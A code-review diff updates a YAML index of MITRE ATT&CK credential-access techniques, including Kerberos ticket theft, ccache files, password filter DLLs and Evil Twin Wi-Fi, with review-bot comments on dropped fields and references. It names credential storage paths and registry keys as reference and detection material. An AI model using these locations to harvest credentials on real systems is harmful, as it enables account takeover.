Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
@@ -44783,38 +45428,13 @@ credential-access:
url: https://pentestlab.blog/2017/04/19/stored-credentials/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1552.002
atomic_tests: []
T1556.002:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Vincent Le Toux
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42
- type: attack-pattern
- created: '2020-02-11T19:05:45.829Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1556.002
- url: https://attack.mitre.org/techniques/T1556/002
- - url: http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html
- description: Fuller, R. (2013, September 11). Stealing passwords every time
- they change. Retrieved November 21, 2017.
- source_name: Carnal Ownage Password Filters Sept 2013
- - url: https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/
- description: Bialek, J. (2013, September 15). Intercepting Password Changes
- With Function Hooking. Retrieved November 21, 2017.
- source_name: Clymb3r Function Hook Passwords Sept 2013
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-08-21T16:16:18.271Z'
name: 'Modify Authentication Process: Password Filter DLL'
description: "Adversaries may register malicious password filter dynamic link
libraries (DLLs) into the authentication process to acquire user credentials
@@ -44838,76 +45458,129 @@ credential-access:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_contributors:
+ - Vincent Le Toux
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor for new, unfamiliar DLL files written to a domain controller and/or local computer. Monitor for changes to Registry entries for password filters (ex: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Notification Packages
) and correlate then investigate the DLL files these files reference.
Password filters will also show up as an autorun and loaded DLL in lsass.exe.(Citation: Clymb3r Function Hook Passwords Sept 2013)
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '2.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'Windows Registry: Windows Registry Key Modification'
- 'File: File Creation'
- 'Module: Module Load'
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42
+ created: '2020-02-11T19:05:45.829Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1556/002
+ external_id: T1556.002
+ - source_name: Clymb3r Function Hook Passwords Sept 2013
+ description: Bialek, J. (2013, September 15). Intercepting Password Changes
+ With Function Hooking. Retrieved November 21, 2017.
+ url: https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/
+ - source_name: Carnal Ownage Password Filters Sept 2013
+ description: Fuller, R. (2013, September 11). Stealing passwords every time
+ they change. Retrieved November 21, 2017.
+ url: http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1556.002
atomic_tests: []
- T1558.004:
- technique:
- x_mitre_platforms:
- - Windows
+ T1558.005:
+ technique:
+ modified: '2024-10-14T21:26:37.856Z'
+ name: Ccache Files
+ description: "\nAdversaries may attempt to steal Kerberos tickets stored in
+ credential cache files (or ccache). These files are used for short term storage
+ of a user's active session credentials. The ccache file is created upon user
+ authentication and allows for access to multiple services without the user
+ having to re-enter credentials. \n\nThe /etc/krb5.conf
configuration
+ file and the KRB5CCNAME
environment variable are used to set
+ the storage location for ccache entries. On Linux, credentials are typically
+ stored in the `/tmp` directory with a naming format of `krb5cc_%UID%` or `krb5.ccache`.
+ On macOS, ccache entries are stored by default in memory with an `API:{uuid}`
+ naming scheme. Typically, users interact with ticket storage using kinit
,
+ which obtains a Ticket-Granting-Ticket (TGT) for the principal; klist
,
+ which lists obtained tickets currently held in the credentials cache; and
+ other built-in binaries.(Citation: Kerberos GNU/Linux)(Citation: Binary Defense
+ Kerberos Linux)\n\nAdversaries can collect tickets from ccache files stored
+ on disk and authenticate as the current user without their password to perform
+ [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003) attacks.
+ Adversaries can also use these tickets to impersonate legitimate users with
+ elevated privileges to perform [Privilege Escalation](https://attack.mitre.org/tactics/TA0004).
+ Tools like Kekeo can also be used by adversaries to convert ccache files to
+ Windows format for further [Lateral Movement](https://attack.mitre.org/tactics/TA0008).
+ On macOS, adversaries may use open-source tools or the Kerberos framework
+ to interact with ccache files and extract TGTs or Service Tickets via lower-level
+ APIs.(Citation: SpectorOps Bifrost Kerberos macOS 2019)(Citation: Linux Kerberos
+ Tickets)(Citation: Brining MimiKatz to Unix)(Citation: Kekeo) "
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: credential-access
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
- x_mitre_contributors:
- - Yossi Nisani, Cymptom
- - James Dunn, @jamdunnDFW, EY
- - Swapnil Kumbhar
- - Jacques Pluviose, @Jacqueswildy_IT
- - Dan Nutting, @KerberToast
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--3986e7fd-a8e9-4ecb-bfc6-55920855912b
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'File: File Access'
type: attack-pattern
- created: '2020-08-24T13:43:00.028Z'
+ id: attack-pattern--394220d9-8efc-4252-9040-664f7b115be6
+ created: '2024-09-17T15:02:31.324Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1558.004
- url: https://attack.mitre.org/techniques/T1558/004
- - source_name: Harmj0y Roasting AS-REPs Jan 2017
- url: http://www.harmj0y.net/blog/activedirectory/roasting-as-reps/
- description: HarmJ0y. (2017, January 17). Roasting AS-REPs. Retrieved August
- 24, 2020.
- - source_name: Microsoft Kerberos Preauth 2014
- url: https://social.technet.microsoft.com/wiki/contents/articles/23559.kerberos-pre-authentication-why-it-should-not-be-disabled.aspx
- description: 'Sanyal, M.. (2014, March 18). Kerberos Pre-Authentication: Why
- It Should Not Be Disabled. Retrieved August 25, 2020.'
- - source_name: Stealthbits Cracking AS-REP Roasting Jun 2019
- url: https://blog.stealthbits.com/cracking-active-directory-passwords-with-as-rep-roasting/
- description: Jeff Warren. (2019, June 27). Cracking Active Directory Passwords
- with AS-REP Roasting. Retrieved August 24, 2020.
- - description: Medin, T. (2014, November). Attacking Kerberos - Kicking the
- Guard Dog of Hades. Retrieved March 22, 2018.
- source_name: SANS Attacking Kerberos Nov 2014
- url: https://redsiege.com/kerberoast-slides
- - url: https://adsecurity.org/?p=2293
- description: Metcalf, S. (2015, December 31). Cracking Kerberos TGS Tickets
- Using Kerberoast – Exploiting Kerberos to Compromise the Active Directory
- Domain. Retrieved March 22, 2018.
- source_name: AdSecurity Cracking Kerberos Dec 2015
- - url: https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/
- description: Bani, M. (2018, February 23). Detecting Kerberoasting activity
- using Azure Security Center. Retrieved March 23, 2018.
- source_name: Microsoft Detecting Kerberoasting Feb 2018
- - source_name: Microsoft 4768 TGT 2017
- url: https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4768
- description: 'Microsoft. (2017, April 19). 4768(S, F): A Kerberos authentication
- ticket (TGT) was requested. Retrieved August 24, 2020.'
- modified: '2021-06-07T19:23:33.039Z'
+ url: https://attack.mitre.org/techniques/T1558/005
+ external_id: T1558.005
+ - source_name: Binary Defense Kerberos Linux
+ description: " ARC Labs, Dwyer, John. Gonzalez, Eric. Hudak, Tyler. (2024,
+ October 1). Shining a Light in the Dark – How Binary Defense Uncovered an
+ APT Lurking in Shadows of IT. Retrieved October 7, 2024."
+ url: https://www.binarydefense.com/resources/blog/shining-a-light-in-the-dark-how-binary-defense-uncovered-an-apt-lurking-in-shadows-of-it/
+ - source_name: Kerberos GNU/Linux
+ description: Adepts of 0xCC. (2021, January 28). The Kerberos Credential Thievery
+ Compendium (GNU/Linux). Retrieved September 17, 2024.
+ url: https://adepts.of0x.cc/kerberos-thievery-linux/
+ - source_name: Kekeo
+ description: Benjamin Delpy. (n.d.). Kekeo. Retrieved October 4, 2021.
+ url: https://github.com/gentilkiwi/kekeo
+ - source_name: SpectorOps Bifrost Kerberos macOS 2019
+ description: Cody Thomas. (2019, November 14). When Kirbi walks the Bifrost.
+ Retrieved October 6, 2021.
+ url: https://posts.specterops.io/when-kirbi-walks-the-bifrost-4c727807744f
+ - source_name: Brining MimiKatz to Unix
+ description: Tim Wadhwa-Brown. (2018, November). Where 2 worlds collide Bringing
+ Mimikatz et al to UNIX. Retrieved October 13, 2021.
+ url: https://labs.portcullis.co.uk/download/eu-18-Wadhwa-Brown-Where-2-worlds-collide-Bringing-Mimikatz-et-al-to-UNIX.pdf
+ - source_name: Linux Kerberos Tickets
+ description: Trevor Haskell. (2020, April 1). Kerberos Tickets on Linux Red
+ Teams. Retrieved October 4, 2021.
+ url: https://www.fireeye.com/blog/threat-research/2020/04/kerberos-tickets-on-linux-red-teams.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
+ T1558.004:
+ technique:
+ modified: '2024-10-15T15:32:07.850Z'
name: 'Steal or Forge Kerberos Tickets: AS-REP Roasting'
description: "Adversaries may reveal credentials of accounts that have disabled
Kerberos preauthentication by [Password Cracking](https://attack.mitre.org/techniques/T1110/002)
@@ -44942,6 +45615,13 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_contributors:
+ - Yossi Nisani, Cymptom
+ - James Dunn, @jamdunnDFW, EY
+ - Swapnil Kumbhar
+ - Jacques Pluviose, @Jacqueswildy_IT
+ - Dan Nutting, @KerberToast
+ x_mitre_deprecated: false
x_mitre_detection: 'Enable Audit Kerberos Service Ticket Operations to log Kerberos
TGS service ticket requests. Particularly investigate irregular patterns of
activity (ex: accounts making numerous requests, Event ID 4768 and 4769, within
@@ -44949,32 +45629,68 @@ credential-access:
pre-authentication not required [Type: 0x0]).(Citation: AdSecurity Cracking
Kerberos Dec 2015)(Citation: Microsoft Detecting Kerberoasting Feb 2018)(Citation:
Microsoft 4768 TGT 2017)'
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Active Directory: Active Directory Credential Request'
- x_mitre_permissions_required:
- - User
x_mitre_system_requirements:
- Valid domain account
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--3986e7fd-a8e9-4ecb-bfc6-55920855912b
+ created: '2020-08-24T13:43:00.028Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1558/004
+ external_id: T1558.004
+ - source_name: Microsoft Detecting Kerberoasting Feb 2018
+ description: Bani, M. (2018, February 23). Detecting Kerberoasting activity
+ using Azure Security Center. Retrieved March 23, 2018.
+ url: https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/
+ - source_name: Harmj0y Roasting AS-REPs Jan 2017
+ description: HarmJ0y. (2017, January 17). Roasting AS-REPs. Retrieved September
+ 23, 2024.
+ url: https://blog.harmj0y.net/activedirectory/roasting-as-reps/
+ - source_name: Stealthbits Cracking AS-REP Roasting Jun 2019
+ description: Jeff Warren. (2019, June 27). Cracking Active Directory Passwords
+ with AS-REP Roasting. Retrieved August 24, 2020.
+ url: https://blog.stealthbits.com/cracking-active-directory-passwords-with-as-rep-roasting/
+ - source_name: SANS Attacking Kerberos Nov 2014
+ description: Medin, T. (2014, November). Attacking Kerberos - Kicking the
+ Guard Dog of Hades. Retrieved March 22, 2018.
+ url: https://redsiege.com/kerberoast-slides
+ - source_name: AdSecurity Cracking Kerberos Dec 2015
+ description: Metcalf, S. (2015, December 31). Cracking Kerberos TGS Tickets
+ Using Kerberoast – Exploiting Kerberos to Compromise the Active Directory
+ Domain. Retrieved March 22, 2018.
+ url: https://adsecurity.org/?p=2293
+ - source_name: Microsoft 4768 TGT 2017
+ description: 'Microsoft. (2017, April 19). 4768(S, F): A Kerberos authentication
+ ticket (TGT) was requested. Retrieved August 24, 2020.'
+ url: https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4768
+ - source_name: Microsoft Kerberos Preauth 2014
+ description: 'Sanyal, M.. (2014, March 18). Kerberos Pre-Authentication: Why
+ It Should Not Be Disabled. Retrieved August 25, 2020.'
+ url: https://social.technet.microsoft.com/wiki/contents/articles/23559.kerberos-pre-authentication-why-it-should-not-be-disabled.aspx
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1558.004
atomic_tests: []
T1558:
technique:
- modified: '2024-03-01T16:58:02.395Z'
+ modified: '2024-09-17T19:49:11.455Z'
name: Steal or Forge Kerberos Tickets
description: |
Adversaries may attempt to subvert Kerberos authentication by stealing or forging Kerberos tickets to enable [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003). Kerberos is an authentication protocol widely used in modern Windows domain environments. In Kerberos environments, referred to as “realms”, there are three basic participants: client, service, and Key Distribution Center (KDC).(Citation: ADSecurity Kerberos Ring Decoder) Clients request access to a service and through the exchange of Kerberos tickets, originating from KDC, they are granted access after having successfully authenticated. The KDC is responsible for both authentication and ticket granting. Adversaries may attempt to abuse Kerberos by stealing tickets or forging tickets to enable unauthorized access.
On Windows, the built-in klist
utility can be used to list and analyze cached Kerberos tickets.(Citation: Microsoft Klist)
-
- Linux systems on Active Directory domains store Kerberos credentials locally in the credential cache file referred to as the "ccache". The credentials are stored in the ccache file while they remain valid and generally while a user's session lasts.(Citation: MIT ccache) On modern Redhat Enterprise Linux systems, and derivative distributions, the System Security Services Daemon (SSSD) handles Kerberos tickets. By default SSSD maintains a copy of the ticket database that can be found in /var/lib/sss/secrets/secrets.ldb
as well as the corresponding key located in /var/lib/sss/secrets/.secrets.mkey
. Both files require root access to read. If an adversary is able to access the database and key, the credential cache Kerberos blob can be extracted and converted into a usable Kerberos ccache file that adversaries may use for [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003). The ccache file may also be converted into a Windows format using tools such as Kekeo.(Citation: Linux Kerberos Tickets)(Citation: Brining MimiKatz to Unix)(Citation: Kekeo)
-
-
- Kerberos tickets on macOS are stored in a standard ccache format, similar to Linux. By default, access to these ccache entries is federated through the KCM daemon process via the Mach RPC protocol, which uses the caller's environment to determine access. The storage location for these ccache entries is influenced by the /etc/krb5.conf
configuration file and the KRB5CCNAME
environment variable which can specify to save them to disk or keep them protected via the KCM daemon. Users can interact with ticket storage using kinit
, klist
, ktutil
, and kcc
built-in binaries or via Apple's native Kerberos framework. Adversaries can use open source tools to interact with the ccache files directly or to use the Kerberos framework to call lower-level APIs for extracting the user's TGT or Service Tickets.(Citation: SpectorOps Bifrost Kerberos macOS 2019)(Citation: macOS kerberos framework MIT)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
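Review bot: the Linux paragraph deleted at L192034–L192036 is the only place in the index that recorded the SSSD ticket store (`/var/lib/sss/secrets/secrets.ldb` and its key `/var/lib/sss/secrets/.secrets.mkey`, both readable only by root), and the replacement T1558.005 description above (L191820–L191845) mentions only the `/tmp` `krb5cc_%UID%` / `krb5.ccache` files and the macOS `API:{uuid}` caches, so that location, and the defensive point that root is required to reach it, disappears from the data. If the goal is to mirror upstream verbatim that is expected; otherwise call it out in the PR description so detection authors who relied on it are not surprised. The macOS paragraph removed at L192039–L192045 does have an equivalent in the new sub-technique (L191828–L191829, L191842–L191844). Also `x_mitre_permissions_required: [User]` (L191974–L191975) is dropped from T1558.004 alongside the 1.0 to 1.1 bump (L191967/L191971) with no field replacing it.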
@@ -45010,7 +45726,7 @@ credential-access:
- Windows
- Linux
- macOS
- x_mitre_version: '1.5'
+ x_mitre_version: '1.6'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Logon Session: Logon Session Metadata'
@@ -45035,13 +45751,6 @@ credential-access:
description: Bani, M. (2018, February 23). Detecting Kerberoasting activity
using Azure Security Center. Retrieved March 23, 2018.
url: https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/
- - source_name: Kekeo
- description: Benjamin Delpy. (n.d.). Kekeo. Retrieved October 4, 2021.
- url: https://github.com/gentilkiwi/kekeo
- - source_name: SpectorOps Bifrost Kerberos macOS 2019
- description: Cody Thomas. (2019, November 14). When Kirbi walks the Bifrost.
- Retrieved October 6, 2021.
- url: https://posts.specterops.io/when-kirbi-walks-the-bifrost-4c727807744f
- source_name: Medium Detecting Attempts to Steal Passwords from Memory
description: French, D. (2018, October 2). Detecting Attempts to Steal Passwords
from Memory. Retrieved October 11, 2019.
@@ -45050,14 +45759,6 @@ credential-access:
description: Jeff Warren. (2019, February 19). How to Detect Pass-the-Ticket
Attacks. Retrieved February 27, 2020.
url: https://blog.stealthbits.com/detect-pass-the-ticket-attacks
- - source_name: macOS kerberos framework MIT
- description: Massachusetts Institute of Technology. (2007, October 27). Kerberos
- for Macintosh Preferences Documentation. Retrieved October 6, 2021.
- url: http://web.mit.edu/macdev/KfM/Common/Documentation/preferences.html
- - source_name: MIT ccache
- description: 'Massachusetts Institute of Technology. (n.d.). MIT Kerberos
- Documentation: Credential Cache. Retrieved October 4, 2021.'
- url: https://web.mit.edu/kerberos/krb5-1.12/doc/basic/ccache_def.html
- source_name: AdSecurity Cracking Kerberos Dec 2015
description: Metcalf, S. (2015, December 31). Cracking Kerberos TGS Tickets
Using Kerberoast – Exploiting Kerberos to Compromise the Active Directory
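Review bot: unlike the Kekeo and SpectorOps references removed just above (L192062–L192068), which reappear under T1558.005 (L191920–L191926), the two MIT references deleted here, `macOS kerberos framework MIT` (L192076–L192079) and `MIT ccache` (L192080–L192083), are not carried over to the new sub-technique's reference list (L191911–L191934). That is consistent with the T1558 description no longer citing them (the surviving text at L192030–L192032 has neither `(Citation: MIT ccache)` nor `(Citation: macOS kerberos framework MIT)`), but it does mean the link to the ccache format definition is gone from the index entirely; worth confirming upstream dropped it deliberately rather than the generator deduplicating it away.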
@@ -45079,23 +45780,14 @@ credential-access:
description: Sean Metcalf. (2014, September 12). Kerberos, Active Directory’s
Secret Decoder Ring. Retrieved February 27, 2020.
url: https://adsecurity.org/?p=227
- - source_name: Brining MimiKatz to Unix
- description: Tim Wadhwa-Brown. (2018, November). Where 2 worlds collide Bringing
- Mimikatz et al to UNIX. Retrieved October 13, 2021.
- url: https://labs.portcullis.co.uk/download/eu-18-Wadhwa-Brown-Where-2-worlds-collide-Bringing-Mimikatz-et-al-to-UNIX.pdf
- - source_name: Linux Kerberos Tickets
- description: Trevor Haskell. (2020, April 1). Kerberos Tickets on Linux Red
- Teams. Retrieved October 4, 2021.
- url: https://www.fireeye.com/blog/threat-research/2020/04/kerberos-tickets-on-linux-red-teams.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1555:
technique:
- modified: '2024-02-26T14:19:09.417Z'
+ modified: '2024-10-15T14:57:46.850Z'
name: Credentials from Password Stores
description: 'Adversaries may search for common password storage locations to
obtain user credentials.(Citation: F-Secure The Dukes) Passwords are stored
@@ -45146,12 +45838,11 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1555
atomic_tests: []
T1552:
technique:
- modified: '2024-04-15T21:33:12.892Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Unsecured Credentials
description: 'Adversaries may search compromised systems to find and obtain
insecurely stored credentials. These credentials can be stored and/or misplaced
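Review bot: `spec_version: '2.1'` is removed here (L192116) and from every other technique object in the diff (L191978, L192103, L192243, L192335, L192421, L192514) while `x_mitre_attack_spec_version` moves to 3.2.0 in the same objects (e.g. L192114, L192130). Dropping the STIX-level `spec_version` looks like a side effect of the generator reading a different export rather than an intended schema change; if any consumer validates these objects as STIX 2.1 it will now fail, so either keep emitting the key or note the schema change in the PR description.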
@@ -45163,6 +45854,7 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Austin Clark, @c2defense
x_mitre_deprecated: false
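Review bot: `x_mitre_attack_spec_version` is emitted directly after `kill_chain_phases` for T1552 (L192130) and T1556.007 (L192300), but at the end of the object for T1558.005 (L191937), T1558.004 (L192020) and T1557.004 (L192241); the same applies to `x_mitre_modified_by_ref` (L192138 vs L192021). The key order therefore differs per object, which is why this refresh shows whole blocks removed and re-added (e.g. L192339–L192381 vs L192404–L192456). Sorting keys deterministically in the generator would make future ATT&CK refreshes reviewable as content diffs.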
@@ -45177,18 +45869,18 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '1.3'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Windows Registry: Windows Registry Key Access'
- 'Application Log: Application Log Content'
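Review bot: T1552 loses the `Azure AD`, `Office 365` and `Google Workspace` platforms (L192141, L192142, L192147) in favour of `Office Suite` and `Identity Provider` (L192151–L192152), and the same rename is applied to T1556.007 further down (L192311–L192314, L192323–L192324). Any derived artefact that still keys on the old platform strings (per-platform index files, platform filters in test runners) will silently stop matching these techniques, so those should be regenerated in this same change, and the PR description should mention the platform rename rather than only the `x_mitre_version` bump to 1.4 (L192153).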
@@ -45211,37 +45903,115 @@ credential-access:
url: https://labs.portcullis.co.uk/download/eu-18-Wadhwa-Brown-Where-2-worlds-collide-Bringing-Mimikatz-et-al-to-UNIX.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ identifier: T1552
+ atomic_tests: []
+ T1557.004:
+ technique:
+ modified: '2024-11-11T18:52:53.686Z'
+ name: Evil Twin
+ description: "Adversaries may host seemingly genuine Wi-Fi access points to
+ deceive users into connecting to malicious networks as a way of supporting
+ follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040),
+ [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002),
+ or [Input Capture](https://attack.mitre.org/techniques/T1056).(Citation: Australia
+ ‘Evil Twin’)\n\nBy using a Service Set Identifier (SSID) of a legitimate Wi-Fi
+ network, fraudulent Wi-Fi access points may trick devices or users into connecting
+ to malicious Wi-Fi networks.(Citation: Kaspersky evil twin)(Citation: medium
+ evil twin) Adversaries may provide a stronger signal strength or block access
+ to Wi-Fi access points to coerce or entice victim devices into connecting
+ to malicious networks.(Citation: specter ops evil twin) A Wi-Fi Pineapple
+ – a network security auditing and penetration testing tool – may be deployed
+ in Evil Twin attacks for ease of use and broader range. Custom certificates
+ may be used in an attempt to intercept HTTPS traffic. \n\nSimilarly, adversaries
+ may also listen for client devices sending probe requests for known or previously
+ connected networks (Preferred Network Lists or PNLs). When a malicious access
+ point receives a probe request, adversaries can respond with the same SSID
+ to imitate the trusted, known network.(Citation: specter ops evil twin) Victim
+ devices are led to believe the responding access point is from their PNL and
+ initiate a connection to the fraudulent network.\n\nUpon logging into the
+ malicious Wi-Fi access point, a user may be directed to a fake login page
+ or captive portal webpage to capture the victim’s credentials. Once a user
+ is logged into the fraudulent Wi-Fi network, the adversary may able to monitor
+ network activity, manipulate data, or steal additional credentials. Locations
+ with high concentrations of public Wi-Fi access, such as airports, coffee
+ shops, or libraries, may be targets for adversaries to set up illegitimate
+ Wi-Fi access points. "
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: credential-access
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ x_mitre_contributors:
+ - Menachem Goldstein
+ - DeFord L. Smith
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Network
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Network Traffic: Network Traffic Content'
+ - 'Network Traffic: Network Traffic Flow'
+ type: attack-pattern
+ id: attack-pattern--48b836c6-e4ca-435a-82a3-29c03e5b492e
+ created: '2024-09-17T14:27:40.947Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1557/004
+ external_id: T1557.004
+ - source_name: Kaspersky evil twin
+ description: AO Kaspersky Lab. (n.d.). Evil twin attacks and how to prevent
+ them. Retrieved September 17, 2024.
+ url: https://usa.kaspersky.com/resource-center/preemptive-safety/evil-twin-attacks
+ - source_name: medium evil twin
+ description: Gihan, Kavishka. (2021, August 8). Wireless Security— Evil Twin
+ Attack. Retrieved September 17, 2024.
+ url: https://kavigihan.medium.com/wireless-security-evil-twin-attack-d3842f4aef59
+ - source_name: specter ops evil twin
+ description: Ryan, Gabriel. (2019, October 28). Modern Wireless Tradecraft
+ Pt I — Basic Rogue AP Theory — Evil Twin and Karma Attacks. Retrieved September
+ 17, 2024.
+ url: https://posts.specterops.io/modern-wireless-attacks-pt-i-basic-rogue-ap-theory-evil-twin-and-karma-attacks-35a8571550ee
+ - source_name: Australia ‘Evil Twin’
+ description: Toulas, Bill. (2024, July 1). Australian charged for ‘Evil Twin’
+ WiFi attack on plane. Retrieved September 17, 2024.
+ url: https://www.bleepingcomputer.com/news/security/australian-charged-for-evil-twin-wifi-attack-on-plane/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- identifier: T1552
atomic_tests: []
T1556.007:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Hybrid Identity
description: "Adversaries may patch, modify, or otherwise backdoor cloud authentication
processes that are tied to on-premises user identities in order to bypass
typical authentication mechanisms, access credentials, and enable persistent
access to accounts. \n\nMany organizations maintain hybrid user and device
identities that are shared between on-premises and cloud-based environments.
- These can be maintained in a number of ways. For example, Azure AD includes
- three options for synchronizing identities between Active Directory and Azure
- AD(Citation: Azure AD Hybrid Identity):\n\n* Password Hash Synchronization
+ These can be maintained in a number of ways. For example, Microsoft Entra
+ ID includes three options for synchronizing identities between Active Directory
+ and Entra ID(Citation: Azure AD Hybrid Identity):\n\n* Password Hash Synchronization
(PHS), in which a privileged on-premises account synchronizes user password
- hashes between Active Directory and Azure AD, allowing authentication to Azure
- AD to take place entirely in the cloud \n* Pass Through Authentication (PTA),
- in which Azure AD authentication attempts are forwarded to an on-premises
+ hashes between Active Directory and Entra ID, allowing authentication to Entra
+ ID to take place entirely in the cloud \n* Pass Through Authentication (PTA),
+ in which Entra ID authentication attempts are forwarded to an on-premises
PTA agent, which validates the credentials against Active Directory \n* Active
Directory Federation Services (AD FS), in which a trust relationship is established
- between Active Directory and Azure AD \n\nAD FS can also be used with other
+ between Active Directory and Entra ID \n\nAD FS can also be used with other
SaaS and cloud platforms such as AWS and GCP, which will hand off the authentication
process to AD FS and receive a token containing the hybrid users’ identity
and privileges. \n\nBy modifying authentication processes tied to hybrid identities,
an adversary may be able to establish persistent privileged access to cloud
resources. For example, adversaries who compromise an on-premises server running
